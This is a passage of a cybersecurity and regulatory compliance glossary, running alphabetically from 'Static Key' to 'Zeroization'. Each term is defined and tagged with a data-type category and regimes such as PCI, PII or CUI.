Static KeynounA key that is intended for use for a relatively long period of time and is typically intended for use in many instances of a cryptographic key establish schemeCredentialRegulated
SteganographynounThe art and science of communicating in a way that hides the existence of the communication. For example, a child pornography image can be hidden inside another graphic image file, audio file, or other file format.ThreatRegulatedPHI
stipulationnoun(law) an agreement or concession made by parties in a judicial proceeding (or by their attorneys) relating to the business before the court; must be in writing unless they are part of the court record.ArtifactRegulated
Store cardnounA credit card issued by a financial institution for a specific merchant or vendor that does not carry a bankcard association logo. Store cards can only be used at the merchant or vendor whose name appears on the front of the card.PhysicalRegulatedPCI
Stored-value cardnounA card-based payment system that assigns a value to the card. The card's value can be stored on the card itself (i.e., on the magnetic stripe or in a computer chip) or in a network database. As the card is used for transactions, the transaction amounts are subtracted from the card's balance. As the balance approaches zero, some cards can be "reloaded" through various methods and others are designed to be discarded. These cards are often used in closed systems for specific types of purchases.PhysicalRegulatedPCI
Striped CorenounA network architecture in which user data traversing a core IP network is decrypted, filtered and re-encrypted one or more times. Note: The decryption, filtering, and re-encryption are performed within a “Red gateway”; consequently, the core is “striped” because the data path is alternately Black, Red, and Black.NetworkRegulatedCUI
Strong AuthenticationnounThe requirement to use multiple factors for authentication and advanced technology, such as dynamic passwords or digital certificates, to verify an entity’s identity.ControlRegulated
strong cryptographynounCryptographic techniques that make it almost impossible to decrypt without having the key. The strength relies on the cryptographic key used. Effective size of the key should meet the minimum key size of comparable strengths recommendations based on industry-tested and accepted algorithms and strong key lengths. Examples of industry-tested and accepted standards and algorithms for encryption include AES (128 bits and higher), TDES (minimum double-length keys), RSA (1024 bits and higher), ECC (160 bits and higher), and ElGamal (1024 bits and higher). See NIST Special Publication 800-57 (http://csrc.nist.gov/publications/) for more information.ControlRegulated
Strong Star PropertynounIn Strong Star Property, a user cannot write data to higher or lower classifications levels than their own.RequirementRegulated
Subject Security LevelnounSensitivity label(s) of the objects to which the subject has both read and write access. Security level of a subject must always be dominated by the clearance level of the user associated with the subject.IdentityRegulatedCUI
Subordinate Certification AuthoritynounIn a hierarchical PKI, a Certification Authority whose certificate signature key is certified by another CA, and whose activities are constrained by that other CA.SystemRegulatedCUI
SubscribernounA party who receives a credential or token from a CSP (Credentials Service Provider) and becomes a claimant in an authentication protocol.IdentityRegulated
Substitute check (Check 21)nounAlso known as the Image Replacement Document (IRD). A paper reproduction of an original check that (1) contains an image of the front and back of the original check; (2) bears a MICR line that, except as provided under ANS X9.100-140, contains all the information appearing on the MICR line of the original check when it was issued and any additional information that was encoded on the original check's MICR line before an image of the original check was captured; (3) conforms in paper stock, dimension, and otherwise with ANS X9.100-140; and (4) is suitable for automated processing in the same manner as the original check. The Federal Reserve Board of Governors can by rule or order determine different standards.ArtifactRegulatedPCI
Suite AnounA specific set of classified cryptographic algorithms used for the protection of some categories of restricted mission-critical information.RequirementRegulatedCUI
Suite BnounA specific set of cryptographic algorithms suitable for protecting national security systems and information throughout the U.S. government and to support interoperability with allies and coalition partners.RequirementRegulatedCUI
SuperencryptionnounProcess of encrypting encrypted information. Occurs when a message, encrypted off-line, is transmitted over a secured, online circuit, or when information encrypted by the originator is multiplexed onto a communications trunk, which is then bulk encrypted.ProcessRegulatedCUI
SupersessionnounScheduled or unscheduled replacement of COMSEC material with a different edition.ProcessRegulatedCUI
supervisory agencynounThis role focuses on the examination or auditing of financial records of financial institutions. Any state authority that is required by law to examine or audit financial records should be assigned to this role.OrganizationRegulated
Supervisory control and data acquisitionnounA generic name for a computerized system that is capable of gathering and processing data and applying operational controls over long distances. Typical uses include power transmission and distribution and pipeline systems. SCADA was designed for the unique communication challenges (delays, data integrity, etc.) posed by the various media that must be used, such as phone lines, microwave, and satellite. Usually shared rather than dedicated.SystemRegulatedCUI
Supply Chain AttacknounAttacks that allow the adversary to utilize implants or other vulnerabilities inserted prior to installation in order to infiltrate data, or manipulate information technology hardware, software, operating systems, peripherals (information technology products) or services at any point during the life cycle.ThreatRegulatedCUI
supply chain risknounA risk measured by the likelihood and severity of damage if an Information Technology or Operations Technology system is compromised by a supply chain attack, and takes into account the importance of the system and the impact of compromise on organizational operations and assets, individuals, other organizations, and the Nation. Supply chain attacks may involve manipulating computing system hardware, software, or services at any point during the life cycle. Supply chain attacks are typically conducted or facilitated by individuals or organizations that have access through commercial ties, leading to stolen critical data and technology, corruption of the system/ infrastructure, and/or disabling of mission-critical operations.ThreatRegulated
Supply Chain Risk ManagementnounThe process of identifying, analyzing, and assessing supply chain risk and accepting, avoiding, transferring or controlling it to an acceptable level considering associated costs and benefits of any actions taken.ProcessRegulated
supply chain risk management processnounThe implementation through controls and structures of strategies to manage both everyday and exceptional risks along the supply chain based on continuous risk assessment with the objective of reducing vulnerability and ensuring continuity.ProcessRegulated
Suppression MeasurenounAction, procedure, modification, or device that reduces the level of, or inhibits the generation of, compromising emanations in an information system.ControlRegulatedCUI
Suspicious activity report (SAR)nounReports required to be filed by the Bank Secrecy Act when a financial institution identifies or suspects fraudulent activity.ArtifactRegulated
Synchronous Crypto-OperationnounEncryption algorithms using the same secret key for encryption and decryption.CapabilityRegulated
Synchronous data replicationnounA process for copying data from one source to another in which an acknowledgement of the receipt of data at the copy location is required for application processing to continue. Consequently, the content of databases stored in alternate facilities is identical to those at the original storage site, and copies of data contain current information at the time of a disruption in processing.ProcessRegulated
System hardeningnounConfiguring all configurable items within an entire system to reduce the host’s security weaknesses.ProcessRegulated
System High ModenounInformation systems security mode of operation wherein each user, with direct or indirect access to the information system, its peripherals, remote terminals, or remote hosts, has all of the following: a. valid security clearance for all information within an information system; b. formal access approval and signed nondisclosure agreements for all the information stored and/or processed (including all compartments, subcompartments and/or special access programs); and c. valid need-to-know for some of the information contained within the information system.ProcessRegulatedCUI
System IndicatornounSymbol or group of symbols in an off-line encrypted message identifying the specific cryptosystem or key used in the encryption.DataRegulatedCUI
System InterconnectionnounThe direct connection of two or more IT systems for the purpose of sharing data and other information resources.NetworkRegulated
System Of RecordsnounA group of any records under the control of any agency from which information is retrieved by the name of the individual or by some identifying number, symbol, or other identifying particular assigned to the individual.DataRegulatedPII
System ProfilenounDetailed security description of the physical structure, equipment component, location, relationships, and general operating environment of an information system.ArtifactRegulatedCUI
TEMPEST ZonenounDesignated area within a facility where equipment with appropriate TEMPEST characteristics (TEMPEST zone assignment) may be operated.PhysicalRegulatedCUI
test resultnounA formal document defining the subject of the test, the test plan, approach, analysis tools, and conclusions found during the testing process.ArtifactRegulated
The process of both entities involved in a transaction verifying each other.nounSource: CNSSI-4009ProcessRegulated
third partynounA person or group besides the two primarily involved in a situation, agreement, business, etc.IdentityRegulated
third party and supply chain managementnounSupply chain management is the oversight of materials, information, and finances as they move in a process from supplier to manufacturer to wholesaler to retailer to consumer. Supply chain management involves coordinating and integrating these flows both within and among companies, i.e., Third Parties. Third party management is the process whereby companies monitor and manage interactions with all external parties with which it has a relationship.ProcessRegulated
third party dependencynounA third party that may have no interest in an organization's project or operations, but can can have an impact on them.RequirementRegulated
third party managementnounAn arrangement where a company will assume the day-to-day management of a property or package of properties it does not own for another company or institution in return for a fee.ProcessRegulated
third party management policynounThe guidelines and rules on how an organization should to direct and supervise business activities and relations with a third party.RequirementRegulated
Third Party Service ProvidernounAs defined in the PCI DSS and PA-DSS Glossary of Terms, Abbreviations, and Acronyms, a service provider is a business entity that is not a payment brand, directly involved in the processing, storage, or transmission of cardholder data on behalf of another entity. This also includes companies that provide services that control or could impact the security of cardholder data. There are many types of businesses that could fall into the category of “service provider,” dependent on the services provided. Most commonly, a TPSP could be a legally separate entity; but it can also be a separate business unit or component of the entity under assessment—for example, an internal service provider—where the provider is outside the direct management control of the entity assessed.OrganizationRegulatedPCI
Third-party relationshipnounAny business arrangement between a financial institution and another entity, by contract or otherwise.ProcessRegulated
Third-party sendernounA special subset of a technology service provider that is authorized to transmit ACH files on behalf of an originator. Typically, the ODFI must rely upon warranties by the third- party sender regarding the originators' identity and credit worthiness, which places additional risks on the ODFI.IdentityRegulated
Third-party service provider (ACH)nounA third party, other than the ODFI or RDFI, that performs any function on behalf of the ODFI or the RDFI related to ACH processing. These functions would include the creation and sending of ACH files or acting as a sending or receiving point on behalf of a participating depository financial institution.OrganizationRegulatedPCI
time framenounA specified period of time for something to be done or take place.RequirementRegulated
Time-Compliance DatenounDate by which a mandatory modification to a COMSEC end-item must be incorporated if the item is to remain approved for operational use.RequirementRegulatedCUI
timelinessnounPublic and private parties, nationally and internationally, should act in a timely coordinately manner to prevent and respond to breaches of security of information systems.RequirementRegulated
TOE Security FunctionsnounSet consisting of all hardware, software, and firmware of the TOE that must be relied upon for the correct enforcement of the TOE Security Policy (TSP).CapabilityRegulatedCUI
Tracking CookienounA cookie placed on a user’s computer to track the user’s activity on different Web sites, creating a detailed profile of the user’s behavior.DataRegulatedPII
Traditional INFOSEC ProgramnounProgram in which NSA acts as the central procurement agency for the development and, in some cases, the production of INFOSEC items. This includes the Authorized Vendor Program. Modifications to the INFOSEC end-items used in products developed and/or produced under these programs must be approved by NSA.ProcessRegulatedCUI
trainingnounOrganized activity aimed at imparting information and/or instructions to improve the recipient's performance or to help him or her attain a required level of knowledge or skill.ProcessRegulated
transaction filenounA group of one or more computerized records containing current business activity and processed with an associated master file. Transaction files are sometimes accumulated during the day and processed in batch production overnight or during off-peak processing periods.DataRegulated
transient cyber assetnounA Cyber Asset that (i) is capable of transmitting or transferring executable code, (ii) is not included in a BES Cyber System, (iii) is not a Protected Cyber Asset (PCA), and (iv) is directly connected (e.g., using Ethernet, serial, Universal Serial Bus, or wireless, including near field or Bluetooth communication) for 30 consecutive calendar days or less to a BES Cyber Asset, a network within an ESP, or a PCA. Examples include, but are not limited to, Cyber Assets used for data transfer, vulnerability assessment, maintenance, or troubleshooting purposes.SystemRegulatedCUI
transmission equipmentnounAny instruments required to electronically transfer data over a network.PhysicalRegulated
Transmission SecuritynounMeasures (security controls) applied to transmissions in order to prevent interception, disruption of reception, communications deception, and/or derivation of intelligence by analysis of transmission characteristics such as signal parameters or message externals. Note: TRANSEC is that field of COMSEC which deals with the security of communication transmissions, rather than that of the information being communicated.ControlRegulatedCUI
Trap Doornoun1. A means of reading cryptographically protected information by the use of private knowledge of weaknesses in the cryptographic algorithm used to protect the data. 2. In cryptography, one-to-one function that is easy to compute in one direction, yet believed to be difficult to invert without special information.VulnerabilityRegulatedCUI
Triple-WrappednounS/MIME usage: data that has been signed with a digital signature, and then encrypted, and then signed again.DataRegulated
Truncating bank (Check 21)nounThe financial institution that truncates the original check. If a person other than a financial institution truncates the original check, the truncating bank is the first financial institution that transfers, presents, or returns, in lieu of such original check, a substitute check or, by agreement with the recipient, information relating to the original check (including data taken from the MICR line of the original check or an electronic image of the original check), whether with or without the subsequent delivery of the original check.OrganizationRegulatedPCI
Trust ListnounThe collection of trusted certificates used by Relying Parties to authenticate other certificates.ArtifactRegulated
Trusted Computer SystemnounA system that employs sufficient hardware and software assurance measures to allow its use for processing simultaneously a range of sensitive or classified information.SystemRegulatedCUI
Trusted DistributionnounMethod for distributing trusted computing base (TCB) hardware, software, and firmware components that protects the TCB from modification during distribution.ProcessRegulatedCUI
Trusted FoundrynounFacility that produces integrated circuits with a higher level of integrity assurance.PhysicalRegulatedCDI
Trusted Identification ForwardingnounIdentification method used in information system networks whereby the sending host can verify an authorized user on its system is attempting a connection to another host. The sending host transmits the required user authentication information to the receiving host.ControlRegulatedCUI
Trusted PathnounA mechanism by which a user (through an input device) can communicate directly with the security functions of the information system with the necessary confidence to support the system security policy. This mechanism can only be activated by the user or the security functions of the information system and cannot be imitated by untrusted software.ControlRegulated
Trusted TimestampnounA digitally signed assertion by a trusted authority that a specific digital object existed at a particular time.ArtifactRegulated
Two-Person ControlnounContinuous surveillance and control of positive control material at all times by a minimum of two authorized individuals, each capable of detecting incorrect and unauthorized procedures with respect to the task being performed and each familiar with established security and safety requirements.ControlRegulatedCUI
Two-Person IntegritynounSystem of storage and handling designed to prohibit individual access by requiring the presence of at least two authorized individuals, each capable of detecting incorrect or unauthorized security procedures with respect to the task being performed. See No-Lone Zone.ControlRegulatedCUI
Type 1 KeynounGenerated and distributed under the auspices of NSA for use in a cryptographic device for the protection of national security information.CredentialRegulatedCUI
Type 1 ProductnounCryptographic equipment, assembly or component classified or certified by NSA for encrypting and decrypting national security information when appropriately keyed. Developed using established NSA business processes and containing NSA-approved algorithms. Used to protect systems requiring the most stringent protection mechanisms.PhysicalRegulatedCUI
Type 2 KeynounGenerated and distributed under the auspices of NSA for use in a cryptographic device for the protection of unclassified information.CredentialRegulatedCUI
Type 2 ProductnounCryptographic equipment, assembly, or component certified by NSA for encrypting or decrypting sensitive information when appropriately keyed. Developed using established NSA business processes and containing NSA-approved algorithms. Used to protect systems requiring protection mechanisms exceeding best commercial practices including systems used for the protection of unclassified information.PhysicalRegulatedCUI
Type 3 KeynounUsed in a cryptographic device for the protection of unclassified sensitive information, even if used in a Type 1 or Type 2 product.CredentialRegulatedCUI
Type 3 ProductnounUnclassified cryptographic equipment, assembly, or component used, when appropriately keyed, for encrypting or decrypting unclassified sensitive U.S. government or commercial information, and to protect systems requiring protection mechanisms consistent with standard commercial practices. Developed using established commercial standards and containing NIST-approved cryptographic algorithms/modules or successfully evaluated by the National Information Assurance Partnership (NIAP).PhysicalRegulatedCUI
Type 4 KeynounUsed by a cryptographic device in support of its Type 4 functionality, i.e., any provision of key that lacks U.S. government endorsement or oversight.CredentialRegulatedCUI
Type 4 ProductnounUnevaluated commercial cryptographic equipment, assemblies, or components that neither NSA nor NIST certify for any government usage. These products are typically delivered as part of commercial offerings and are commensurate with the vendor’s commercial practices. These products may contain either vendor proprietary algorithms, algorithms registered by NIST, or algorithms registered by NIST and published in a FIPS.ArtifactRegulatedCUI
Type AccreditationnounA form of accreditation that is used to authorize multiple instances of a major application or general support system for operation at approved locations with the same type of computing environment. In situations where a major application or general support system is installed at multiple locations, a type accreditation will satisfy C&A requirements only if the application or system consists of a common set of tested and approved hardware, software, and firmware.ProcessRegulated
Type CertificationnounThe certification acceptance of replica information systems based on the comprehensive evaluation of the technical and nontechnical security features of an information system and other safeguards, made as part of and in support of the formal approval process, to establish the extent to which a particular design and implementation meet a specified set of security requirements.ProcessRegulatedCUI
U.S. PersonnounFederal law and Executive Order define a U.S. Person as: a citizen of the United States; an alien lawfully admitted for permanent residence; an unincorporated association with a substantial number of members who are citizens of the U.S. or are aliens lawfully admitted for permanent residence; and/or a corporation that is incorporated in the U.S.IdentityRegulatedPII
U.S.-Controlled FacilitynounBase or building to which access is physically controlled by U.S. individuals who are authorized U.S. government or U.S. government contractor employees.PhysicalRegulatedCUI
U.S.-Controlled SpacenounRoom or floor within a facility that is not a U.S.-controlled facility, access to which is physically controlled by U.S. individuals who are authorized U.S. government or U.S. government contractor employees. Keys or combinations to locks controlling entrance to U.S.-controlled spaces must be under the exclusive control of U.S. individuals who are U.S. government or U.S. government contractor employees.PhysicalRegulatedCUI
unapproved Information Technology resourcenounAn unsanctioned Information Technology resource.SystemRegulated
unauthorized accessnounOccurs when a user, legitimate or unauthorized, accesses a resource that the user is not permitted to use.EventRegulated
unauthorized access is detectednounThis Triggering Event takes place when a person, legitimate or unauthorized, accesses a resource that the person is not permitted to use or enters a facility or area the person is not permitted to enterEventRegulated
unauthorized attemptnounA try at gaining access to a system without authorization or approval.EventRegulated
unauthorized changenounA purposeful and perhaps unlawful modification of financial data to hide wrong-doing, loss or other disclosure.EventRegulated
Unauthorized DisclosurenounAn event involving the exposure of information to entities not authorized access to the information.EventRegulated
unauthorized mobile codenounA program (e.g., script, macro, or other portable instruction) that can be shipped unchanged to a heterogeneous collection of platforms and executed with identical semantics -- that has not been permitted by the controlling authority.ThreatRegulated
unauthorized physical accessnounAccess to a building, room, site, etc that is not permitted.EventRegulated
unauthorized softwarenounAn application or device driver who use is not been permitted by the controlling authority.ThreatRegulated
unauthorized usenounUse of an asset for a person's own purpose without the consent of the owner.ThreatRegulated
UnclassifiednounInformation that has not been determined pursuant to E.O. 12958, as amended, or any predecessor order, to require protection against unauthorized disclosure and that is not designated as classified.RequirementRegulatedCUI
unescorted accessnounNot having to be escorted to gain access to a facility, area, or system.ControlRegulated
Uniform Rating System For Information TechnologynounAn internal rating system used by federal and state regulators to uniformly assess financial institution and service provider risks introduced by IT.FrameworkRegulated
United States Government Configuration BaselinenounThe United States Government Configuration Baseline (USGCB) provides security configuration baselines for Information Technology products widely deployed across the federal agencies. The USGCB baseline evolved from the federal Desktop Core Configuration mandate. The USGCB is a Federal government-wide initiative that provides guidance to agencies on what should be done to improve and maintain an effective configuration settings focusing primarily on security.FrameworkRegulatedCUI
unnecessary default accountnounDefault accounts that are not necessary to be installed on the system.VulnerabilityRegulated
unpatched softwarenounSoftware which has not undergone a vulnerability correction, a defect correction, or an improvement of code function.VulnerabilityRegulated
unposted suspense itemnounA transaction that has not yet been processed, but may affect the amount of credit available.ArtifactRegulatedPCI
unsuccessful authentication attemptnounA failed attempt to receive authentication to access a system.EventRegulated
Untrusted ProcessnounProcess that has not been evaluated or examined for correctness and adherence to the security policy. It may include incorrect or malicious code that attempts to circumvent the security mechanisms.ProcessRegulated
USA Patriot ActnounThe USA PATRIOT Act (Uniting and Strengthening America by Providing Appropriate Tools Required to Intercept and Obstruct Terrorism Act of 2001 (Public Law Pub.L. 107-56), commonly known as the "Patriot Act", was enacted by Congress to deter and punish terrorist acts in the United States and around the world by enhancing the law enforcement investigatory tools of both domestic law enforcement and foreign intelligence agencies.RequirementRegulatedCUI
user access reviewnounA process that an organization implements to actively monitor and verify the appropriateness of a users' access to systems and applications based on an understanding of the minimum necessary for users to perform or support business activities or functions. The responsibility for granting access and performing periodic verification of the appropriateness of that access rests with the system and/or business owner of the system or application.ProcessRegulated
user accountnounInformation that tells a computer which files and folders to access for a specific user, which personal preferences to have in place, and what can be accessed by the user.IdentityRegulated
User account activitynounAll events and processes executed including logons and logouts associated with a system user account.IdentityRegulated
User IDnounUnique symbol or character string used by an information system to identify a specific user.IdentityRegulatedPII
User IdentificationnounThe process, control, or information by which a user identifies himself or herself to the system as a valid user (as opposed to authentication).ProcessRegulatedPII
User InitializationnounA function in the life cycle of keying material; the process whereby a user initializes its cryptographic application (e.g., installing and initializing software and hardware).ProcessRegulatedCUI
User Partnership ProgramnounPartnership between the NSA and a U.S. government agency to facilitate development of secure information system equipment incorporating NSA-approved cryptography. The result of this program is the authorization of the product or system to safeguard national security information in the user’s specific application.ProcessRegulatedCUI
User RepresentativenounIndividual authorized by an organization to order COMSEC keying material and interface with the keying system, provide information to key users, and ensure the correct type of key is ordered.RoleRegulatedCUI
Verifier Impersonation AttacknounA scenario where the Attacker impersonates the Verifier in an authentication protocol, usually to capture information that can be used to masquerade as a Claimant to the real Verifier.ThreatRegulated
Virtual private networknounProtected information system link utilizing tunneling, security controls (see Information Assurance), and endpoint address translation giving the impression of a dedicated lineNetworkRegulated
virtual private network accessnounPermission or ability for an external user to connect to a Virtual Private Network.ControlRegulated
visitor accessnounThe processes and mechanisms of ensuring visitors are allowed in specific areas and with specific permissions. Mechanisms such as guarded entries, logged entry, badges, and escorting of visitors are common.ProcessRegulated
visitor control programnounA documented listing of procedures, schedules, roles and responsibilities, and plans to be performed to identify, control, and reduce or eliminate the risks inherent to visitors.ProcessRegulated
visitor lognounA paper or electronic record of any non-employee entering a facility, construction site, structure or website.ArtifactRegulatedCUI
Vulnerability AssessmentnounSystematic examination of an information system or product to determine the adequacy of security measures, identify security deficiencies, provide data from which to predict the effectiveness of proposed security measures, and confirm the adequacy of such measures after implementation.VulnerabilityRegulated
vulnerability scannounThe check of a system for known vulnerabilities from beginning to end with resultant errors, and status information.VulnerabilityRegulated
weaknessnounAn exception noted in tests of properly designed internal controls that may indicate ineffectiveness. Management must consider the extent of a weakness in such cases. Weaknesses can be classified as a simple deficiency, significant deficiency, or a material weakness.VulnerabilityRegulated
Web BugnounMalicious code, invisible to a user, placed on Web sites in such a way that it allows third parties to track use of Web servers and collect information about the user, including IP address, host name, browser type and version, operating system name and version, and Web browser cookie.ThreatRegulatedPII
WEB SEC codenounAn ACH debit entry initiated by an originator resulting from the receiver's authorization through the Internet to make a transfer of funds from a consumer account of the receiver.ArtifactRegulatedPII
Website hostingnounThe service of providing ongoing support and monitoring of an Internet-addressable computer that stores webpages and processes transactions initiated over the Internet.SystemRegulated
Wi-Fi Protected Access-2nounThe approved Wi-Fi Alliance interoperable implementation of the IEEE 802.11i security standard. For federal government use, the implementation must use FIPS-approved encryption, such as AES.ControlRegulated
wire servicernounA financial institution that offers electronic funds transfer serviceOrganizationRegulatedPCI
WiretappingnounMonitoring and recording data that is flowing between two points in a communication system.ThreatRegulated
work papernounThe written record of the basis for the auditor's conclusions that provides the support for the auditor's representations, whether those representations are contained in the auditor's report or otherwise.ArtifactRegulated
Work transfernounWork-transfer is a process whereby the staff located at a recovery site accepts the workload of staff located at a primary production site, and a data center located at a recovery site accepts the workload of the primary data processing site.ProcessRegulated
Write blockernounA devices that allows the acquisition of information on a drive without creating the possibility of accidentally damaging the drivePhysicalRegulated
ZeroizationnounA method of erasing electronically stored data, cryptographic keys, and Credentials Service Providers (CSPs) by altering or deleting the contents of the data storage to prevent recovery of the data.ControlRegulatedCUI